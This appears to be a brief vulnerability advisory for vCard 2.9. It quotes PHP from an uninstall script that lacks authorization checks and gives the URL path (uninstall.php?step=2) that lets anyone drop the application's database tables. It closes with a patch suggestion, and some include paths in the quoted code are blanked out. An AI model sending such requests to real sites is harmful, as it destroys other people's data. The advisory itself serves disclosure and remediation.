Informations : °°°°°°°°°°°°°° Procduct: Vcard Version : 2.9 may other VER Problems : File uninstall & delete the table PHP Code/Location : °°°°°°°°°°°°°°°°°°° /admin/uninstall.php : ------------------------------------------------------------------------ [...] <? $step = $HTTP_GET_VARS['step']; if (empty($step)) { echo "<p><b>Are you sure, uninstall vCard database tables and them contents?</b></p>"; echo "<p>Yes, I'm sure. <a href='$PHP_SELF?step=2'>Click here to continue --></a></p>"; } if ($step == 2) { include "./"; include("./"); include("./"); $DB_site = new DB_Sql_vc; $DB_site->server = $hostname; $DB_site->user = $dbUser; $DB_site->password = $dbPass; $DB_site->database = $dbName; $DB_site->connect(); $dbPass = ""; $DB_site->password = ""; //********************************************* $DB_site->query("DROP TABLE IF EXISTS vcard_abook "); $DB_site->query("DROP TABLE IF EXISTS vcard_account "); ?> As u can see the script does not Check User Authorization Exploit: °°°°°°°°°° http://[target]/[Vcard folder]/admin/uninstall.php or http://[target]/[Vcard folder]/admin/uninstall.php?step=2 patch: °°°°°°°°°° remove uninstall.php and protect admin folder by .htaccess Saudi Linux KSA o0 KSA 0o